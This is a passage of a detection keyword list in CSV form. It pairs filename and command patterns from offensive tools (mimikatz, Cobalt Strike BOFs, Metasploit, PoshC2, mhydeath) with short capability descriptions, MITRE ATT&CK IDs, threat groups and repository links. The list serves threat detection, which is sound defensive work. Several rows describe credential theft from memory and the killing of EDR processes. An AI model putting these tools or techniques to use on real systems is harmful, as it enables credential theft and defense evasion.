
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::run*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::runp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::start*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::stop*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process::suspend*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*process_herpaderping*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*process_imports.cna*,offensive_tool_keyword,cobaltstrike,A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL_Imports_BOF,1,1,N/A,10,10,80,10,2021-10-28T18:07:09Z,2021-10-27T21:02:44Z -*process_imports.x64*,offensive_tool_keyword,cobaltstrike,A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL_Imports_BOF,1,1,N/A,10,10,80,10,2021-10-28T18:07:09Z,2021-10-27T21:02:44Z -*process_imports_api *.exe*,offensive_tool_keyword,cobaltstrike,A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL_Imports_BOF,1,0,N/A,10,10,80,10,2021-10-28T18:07:09Z,2021-10-27T21:02:44Z -*process_inject_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_bof_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_bof_reuse_memory*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_execute*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z 
-*process_inject_min_alloc*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_startrwx*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*Process_Inject_Struct*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*process_inject_transform_x*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_userwx*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_killer.exe*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*process_memdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*process_mimikatz*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - 
HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*process_protection_enum *,offensive_tool_keyword,cobaltstrike,A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Process_Protection_Level_BOF,1,0,N/A,10,10,48,7,2021-08-30T00:18:57Z,2021-08-29T23:08:22Z -*process_protection_enum*.dmp*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com//EspressoCake/HandleKatz_BOF,1,1,N/A,10,,N/A,,, -*process_protection_enum.*,offensive_tool_keyword,cobaltstrike,A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Process_Protection_Level_BOF,1,1,N/A,10,10,48,7,2021-08-30T00:18:57Z,2021-08-29T23:08:22Z 
-*Process_Protection_Level_BOF.*,offensive_tool_keyword,cobaltstrike,A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 